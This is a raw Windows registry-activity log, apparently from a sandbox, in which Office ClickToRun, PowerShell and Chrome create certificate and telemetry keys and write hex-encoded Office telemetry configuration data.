69717565417574686f72566563746f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243726561746555736572496e666f46726f6d417574686f72566563746f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224973436c6f7564446f63756d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225365745361766564507265526571735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224372656174655265766973696f6e53657441637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574436f6d6d656e74436f6e74656e744964656e7469666965725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f67436f6d6d656e744174747269627574696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472794372656174654c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536176654c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253657453617665645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224162616e646f6e4c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224372656174655461736b41637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225461736b4372656174696f6e41637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526561737369676e5461736b41637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656f70656e5461736b41637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6d706c6574655461736b41637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224465736b746f704261636b73746167655c22203a207b205c224576656e74735c22203a207b205c22536176654173526563656e74436c69636b65645c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2253617665417344656661756c745365727669636553656c656374696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f70656e526563656e74446f63756d656e747356696577436c69636b65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f70656e526563656e74446f63756d656e7473566965775769746846656174757265456e61626c6564436c69636b65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22424743616c634d616e6167657250726f6365737353657456616c75657350726f635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22424743616c6349646c655461736b46457865637574655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22506c6163657347726f757065724163636f756e74496e666f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657474696e67537461727465644d5255536c61624765744d72754461746554696d6547726f7570547970655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f70656e526563656e744c6f636174696f6e7356696577436c69636b65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224e617669676174696f6e5265616453697465526f6f74427956726f6f6d5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224e617669676174696f6e52656164446f634c6962466f6c646572427956726f6f6d5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224f666669636553706163655c22203a207b205c225375624e616d657370616365735c22203a207b205c224465736b746f704261636b73746167654e617669676174696f6e5c22203a207b205c224576656e74735c22203a207b205c224c617a794c6f616446696c6543616368655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224c6f616446726f6d46696c6543616368655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2253617665496e746f46696c6543616368655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2252656164546869735043526f6f745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c22526561644c6f63616c466f6c6465725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225265616453697465526f6f74427956726f6f6d5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224765744974656d57656244617655726c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2247657452656d6f74654974656d496e666f726d6174696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2252656164446f634c6962466f6c646572427956726f6f6d5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22526561644d696772617465644f4443466f6c646572427956726f6f6d5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d2c205c22504358506572736f6e6150686f746f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f757453706163655c22203a207b205c224576656e74735c22203a207b205c22557064617465506c616365735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224372656174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486964655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225365744d72754c697374466f72486f6d65506167655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c65616e75705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536861726564576974684d65506f70756c6174654c6973745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225570646174654d52554974656d735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f70656e4469736d6973735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224e65774469736d6973735c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c224465736b746f704261636b73746167655c22203a207b205c224576656e74735c22203a207b205c224261636b73746167654469736d69737365645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f5265636f76657279436f6d7061726557697468556e736176656456657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f5265636f7665727944656c657465556e736176656456657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f5265636f766572794f70656e556e736176656456657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f5265636f76657279506f70756c617465556e736176656456657273696f6e4c6973745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e69744e65774e6176466f6c6465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224e6577536572766963654c6973745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c225368617265506f696e7453697465735c22203a207b205c224576656e74735c22203a207b205c2247726f75707353697465735265717565737449636f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e745369746573496e697469616c697a655369746573436f6c6c656374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e74536974657350726f63657373526573756c74466f724964656e746974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e7453697465734964656e74697479436163686552657175657374526573756c745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e7453697465735265717565737453697465734361636865645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e7453697465735265717565737453697465734173796e6350726f63657373526573756c745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e7453697465735265717565737453697465734173796e635c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224372656174654c6f636174696f6e735c22203a207b205c224576656e74735c22203a207b205c2244656661756c744964656e74697479456d7074795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253686172696e674c6567616379436c69656e745c22203a207b205c224576656e74735c22203a207b205c22476574446174615c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22486f6d65506167655c22203a207b205c224576656e74735c22203a207b205c22506c6163654368616e6765536c6162436f6e646974696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e53686f77486f6d65506167655c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c225365617263685c22203a207b205c224576656e74735c22203a207b205c225365656e4279557365725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c224f666669636553746172745c22203a207b205c224576656e74735c22203a207b205c22536574757054656d706c61746550726f706572746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243757272656e745549416374697665506c6163654368616e67655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22547269676765725468756d626e61696c416374696f6e52756e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f63756d656e744e6f74696669636174696f6e735c22203a207b205c224576656e74735c22203a207b205c2252656769737465724f6e49646c65466561747572654761746544697361626c65645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d7275536572766963654170695c22203a207b205c225375624e616d657370616365735c22203a207b205c22446f63756d656e74735c22203a207b205c224576656e74735c22203a207b205c2252656164526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225772697465526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e526571756573745375636365656465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22506c616365735c22203a207b205c224576656e74735c22203a207b205c2252656164526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225772697465526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e526571756573745375636365656465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c224d736f53686172696e675c22203a207b205c224576656e74735c22203a207b205c22434d736f53686172696e675365727669636548656c706572456e64476574486f73744361706162696c69746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572476574486f73744361706162696c69746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e6447657455736572417474726962757465735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c70657247657455736572417474726962757465735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e644765744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065724765744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ETag = "std::wstring|\"oifxXcYG5TtLvZoogJ5HQJvoH6f6oyQgMHpiuT6xHAQ=\"" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.12 = 3a207b205c22416c7465726e6174655472616e736c6174696f6e735265747269657665645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6e7465787475616c53756767657374696f6e734c6f616465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745465787453656c65637465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745472616e736c617465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745472616e736c61746564466565646261636b547269676765725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745472616e736c6174696f6e43616e63656c6c65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745472616e736c6174696f6e53756767657374696f6e436c69636b65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224578636c756465644c616e677561676541646465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224578636c756465644c616e677561676552656d6f7665645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d6963726f666565646261636b566f746553656c65637465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6f786d6c5472616e736c617465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253657474696e6773436c6f7365645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253657474696e67734f70656e65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536f75726365446f63756d656e744c616e674368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536f75726365546172676574537761707065645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536f75726365546578744c616e674368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546172676574446f63756d656e744c616e674368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546172676574546578744c616e674368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546578745472616e736c617465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736c6174696f6e496e7365727465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736c6174696f6e4c616e6775616765734c6f616465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472616e736c6174696f6e5461624368616e6765645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416c7465726e6174655472616e736c6174696f6e4578616d706c655265747269657665645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416c7465726e6174655472616e736c6174696f6e436f706965645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464496e4c6f616465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e5558222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22436f6c6f725069636b65725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6d696e67536f6f6e54435348574e445c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224e6f46696c65457874656e73696f6e49636f6e4d617070696e675c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c225344585c22203a207b205c225375624e616d657370616365735c22203a207b205c224d65436f6e74726f6c5c22203a207b205c224576656e74735c22203a207b205c22547261636b65645363656e6172696f5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c225465616368696e6743616c6c6f75745c22203a207b205c224576656e74735c22203a207b205c225465616368696e6743616c6c6f7574416c726561647953686f776e4d617854696d65735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465616368696e6743616c6c6f7574416c726561647953686f776e5468697353657373696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465616368696e6743616c6c6f7574546f6f4d616e7953686f776e5468697353657373696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2244796e616d69634470695c22203a207b205c224576656e74735c22203a207b205c22446973706c6179546f706f6c6f6779456e756d65726174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446973706c6179546f706f6c6f67794368616e6765645c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22446f63756d656e745265636f766572795c22203a207b205c224576656e74735c22203a207b205c22496e76616c696461746550616e65735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22546f6f6c746970735c22203a207b205c224576656e74735c22203a207b205c2253686f77546f6f6c7469705c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22416e63686f7252656769737472795c22203a207b205c224576656e74735c22203a207b205c224765744f72437265617465416e63686f7252656769737472795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22526962626f6e546162735c22203a207b205c224576656e74735c22203a207b205c22526962626f6e5461624163746976617465645f466c6f6f64676174655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e576f7264222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c224544505c22203a207b205c224576656e74735c22203a207b205c22446f63756d656e744964656e746974794368616e67655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2250726f6f66696e675c22203a207b205c224576656e74735c22203a207b205c2250726f6f66696e674e6f50726f6f66526567696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225453706c4c6f61644c6962726172795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c6f75645370656c6c6572436865636b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224e6f50726f6f6652756e4469666665727346726f6d5061726150726f705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c617373696669636174696f6e4372697469717565526573706f6e7365506572664d61704578636565645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224772616d6d6172436865636b657243616c6c5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22536176655c22203a207b205c224576656e74735c22203a207b205c22436d64446f53617665446f63436f7265436f6d6d616e64416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436d64446f53617665446f63436f7265416374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22464d617953746172745472616e73616374696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224669726553746174654f664175746f536176654f6e436c6f73655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22456964456e737572654f70656e466f72536176655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2242475361766546616c6c6261636b546f46475c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22576f72645c22203a207b205c225375624e616d657370616365735c22203a207b205c22426f6f745c22203a207b205c225375624e616d657370616365735c22203a207b205c2254696d696e675c22203a207b205c224576656e74735c22203a207b205c22446174615c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d2c205c22426f6f745c22203a207b205c224576656e74735c22203a207b205c22416464696e4d6f6e69746f7256616c6964617465426f6f745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464696e44697361626c65644469616c6f675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22416464696e4d6f6e69746f7256616c6964617465426f6f74325c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2246696c654f70656e5c22203a207b205c224576656e74735c22203a207b205c22464e4d45696453657446726f6d5873747a46747970466e6d4469725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e697469616c697a6542696e6172794261636b696e6753746f72654361636865735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22576f72644d61696c5c22203a207b205c224576656e74735c22203a207b205c2248724c6f61645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872536176655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f6354696c696e675c22203a207b205c224576656e74735c22203a207b205c2254696c696e6749646c6542756e646c654576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2254696c696e6749646c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2254696c696e6749646c654865617274626561745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2254696c696e6749646c654669726542756e646c65644576656e74735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465787454696c65446f63756d656e7456696577476574456e756d657261746f724576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465787454696c65446f63756d656e7456696577446973636f6e6e6563745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465787454696c65446f63756d656e745669657753696e6b52656769737465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225465787454696c65446f63756d656e745669657753696e6b556e72656769737465725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22436f417574686f72696e675c22203a207b205c224576656e74735c22203a207b205c224f6373446f776e6c6f6164526566557064617465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2244796e616d696353617665496e697469616c496e666f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22507573684f70526571756573745374617475735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22507573684f70436f6d706c657465645374617475735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2254687265655761794d657267655c22203a207b205c224576656e74735c22203a207b205c22435254435265766572745265706c61794b706f7353636f70654475726174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2246696c65536176655c22203a207b205c224576656e74735c22203a207b205c22436d645361766546696c65436f7265325c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2255494d5c22203a207b205c224576656e74735c22203a207b205c224655494d426567696e556e646f4265666f726546426567696e556e646f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224655494d426567696e556e646f416674657246426567696e556e646f5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224163636573736962696c6974795c22203a207b205c224576656e74735c22203a207b205c22416363436865636b657256696f6c6174696f6e547970655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2247726170686963735c22203a207b205c224576656e74735c22203a207b205c2245326f496e666f466f72446f63756d656e74436f6e7461696e696e674475706c696361746541727469645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446961676e6f737469635c22203a207b205c224576656e74735c22203a207b205c22496e636f73697374656e74526561644f6e6c79446f6350726f70657274795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22547261636b4368616e6765735c22203a207b205c224576656e74735c22203a207b205c22557463547261636b4368616e67657341646465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2255736572507265666572656e63655c22203a207b205c224576656e74735c22203a207b205c225365744972665c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e4368616e6765476174652e4361636865456e726963686d656e74416363657373546f6b656e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e526573656172636865722e4e6f64654a5357656250616765457874726163746f72222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e48656c704974656d53706c6974427574746f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e48656c7050726f7669646572456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e497350656f706c654974656d53706c6974427574746f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e4d616a6f724974656d53706c6974427574746f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e4d6178436f6d6d616e64526573756c7473546f52657475726e222c20225622203a2022696e7433325f747c3422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e506172616d657465725465726d50726564696374696f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e51756572794c6f6767696e67456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e536861726564446f63756d656e74456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e53686f756c6453686f7748656c70416374696f6e73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e53686f774f6e6c794974656d4c6162656c49664465736372697074696f6e49734e756c6c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e57617465726d61726b506172616d65746572697a6174696f6e456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5543492e54656c6c4d652e5a65726f417373697374616e6365526573756c7473456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e4973506572736f6e6150726f66696c65504358456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e52656d6f76654d53414148616e646c6572466f7254657874426f78222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5465616368696e6743616c6c6f757454696d654f6e53637265656e54656c656d65747279222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5468656d696e672e5573654d656469756d4c756d696e616e63655468726573686f6c64222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5569614e6f74696669636174696f6e73466f72427573426172456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e556961 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|12" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|5" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|11" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\Expires = "int64_t|1711498909" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133559283764396213" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|7" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
